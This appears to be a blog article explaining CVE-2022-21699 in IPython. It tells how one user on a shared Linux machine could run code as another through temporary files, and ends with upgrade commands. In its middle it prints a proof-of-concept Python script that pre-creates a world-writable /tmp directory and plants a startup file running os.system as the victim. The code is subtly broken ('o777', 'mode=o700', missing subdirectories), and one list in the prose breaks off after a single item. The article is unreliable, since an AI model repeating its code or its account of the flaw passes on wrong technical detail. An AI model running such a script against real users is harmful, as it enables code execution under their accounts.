CVE-2022-21699 - How a Simple Temp File Bug Let Hackers Run Code as You in IPython

When we talk about software attacks, we often think of complex bugs or typical web vulnerabilities. But sometimes, a basic mistake—like how temporary files are handled—can open the door to significant exploits. CVE-2022-21699 is a real example: IPython, a popular command shell for interactive Python programming, had a vulnerability that let one user execute code as another. This article breaks down what happened, how it works, and shows you practical details on why you should upgrade your IPython installation now.

What Is IPython?

IPython is a powerful shell for interactive and exploratory programming. People use it for data science, automation, and general scripting, mainly in Python (but it can support other languages via extensions).

If you're on a shared server—like a university machine, cloud service, or even your work laptop used by multiple logins—this bug could let someone else on the same box run code pretending to be you. Ouch.

What Went Wrong: The Vulnerability Explained

IPython used temporary files in a way that didn’t keep each user's data separate or protected. Instead of putting temporary files in a user-specific directory or using safe permissions, it put them somewhere accessible to other users. That means two things:

Worse, a user could manipulate that file.

If an attacker knows how IPython names and manages these temp files, they can race to swap in something malicious or read secrets not meant for them.

The Core Problem

IPython creates temporary directories for things like code execution, logging, or configuration. The bug? These were created in places like /tmp or /var/tmp on Linux, with _predictable names_ and _permissions that didn’t restrict access_. That’s a classic recipe for disaster on shared machines.

Exploiting the Flaw: How a Malicious User Could Attack

Let's imagine Alice and Bob are two users on a Linux machine. Alice is working with IPython, unaware of the danger. But Bob is curious—and maybe up to no good.

Here’s how Bob could exploit CVE-2022-21699

1. Monitor /tmp for new temp files created by Alice’s IPython session.
These files may appear as /tmp/ipython-XXXX or something similar.

2. Race to create/join the temporary folder before Alice’s session does, set special permissions, or put in malicious files.

3. Place a specially-crafted Python file, or a symlink pointing to a sensitive file (like .ssh/authorized_keys) inside Alice’s temporary folder.

4. When Alice launches IPython, it loads her session with those files in place. IPython (running as Alice) might execute arbitrary Python code or append to her files—giving Bob control.

Here’s a basic exploit example you might see in the wild (for educational use only)

import os
import time

# Example: 'ipython-username-123' is how old versions named temp directories
victim_user = 'alice'
for i in range(100, 110):
    temp_dir = f"/tmp/ipython-{victim_user}-{i}"
    if not os.path.exists(temp_dir):
        # Try to create the directory before the victim does
        os.mkdir(temp_dir, o777)  # world-writable on purpose
        # Place a malicious Python file in her temp space
        with open(f"{temp_dir}/profile_default/startup/evil.py", "w") as f:
            f.write("import os; os.system('echo Hacked by Bob > /home/alice/hacked.txt')\n")
        print(f"Waiting for Alice to start IPython... ({temp_dir})")
        while os.path.exists(temp_dir):
            time.sleep(1)

This is a simplified example.

- The real attack usually needs knowledge of the exact temp naming schema and timing, but attackers can monitor /tmp for new files.

The Fix

The maintainers of IPython patched this bug in this commit. They made temp files and directories private to the user and switched to using Python’s tempfile module properly with mode=o700, so only the owner can see/access the files.

If you use IPython on any shared environment, you should upgrade to at least version 7.31.1 or later.

- Security Advisory
- GitHub Issue
- Full CVE-2022-21699 Details

This isn’t just theory—shared servers are still common.

- Cloud Jupyter/Colab environments or university servers might have dozens of users and projects running IPython.

Quick How-To: Check Your IPython Version and Upgrade

ipython --version

# If < 7.31.1, upgrade:
pip install --upgrade ipython

Or, if you use Anaconda

conda update ipython

Stay safe, and keep your tools up-to-date.

If you're curious or want to read more, check the official CVE-2022-21699 Report and the IPython security page.

Timeline

Published on: 01/19/2022 22:15:00 UTC
Last modified on: 03/25/2022 15:04:00 UTC